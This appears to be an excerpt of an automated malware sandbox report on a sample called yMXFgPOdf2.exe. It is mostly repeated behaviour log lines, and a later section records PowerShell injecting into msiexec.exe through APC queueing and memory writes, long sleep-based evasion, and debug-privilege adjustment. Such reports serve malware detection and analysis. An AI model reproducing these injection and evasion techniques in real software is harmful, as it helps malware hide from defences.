      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7926Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1730Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5560Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 6520Thread sleep time: -70000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_00405629 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405629
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_004060E4 FindFirstFileW,FindClose,0_2_004060E4
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\TemplatesJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2633960829.000000000593A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\eq
      Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2633960829.000000000593A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\eq
      Source: powershell.exe, 00000002.00000002.2633960829.000000000593A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\eq
      Source: msiexec.exe, 00000006.00000002.3919635196.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147600685.0000000000C44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeAPI call chain: ExitProcess graph end nodegraph_0-2951
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeAPI call chain: ExitProcess graph end nodegraph_0-3092
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04AE77F9 LdrInitializeThunk,2_2_04AE77F9
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_0040610B GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040610B
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 41F0000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
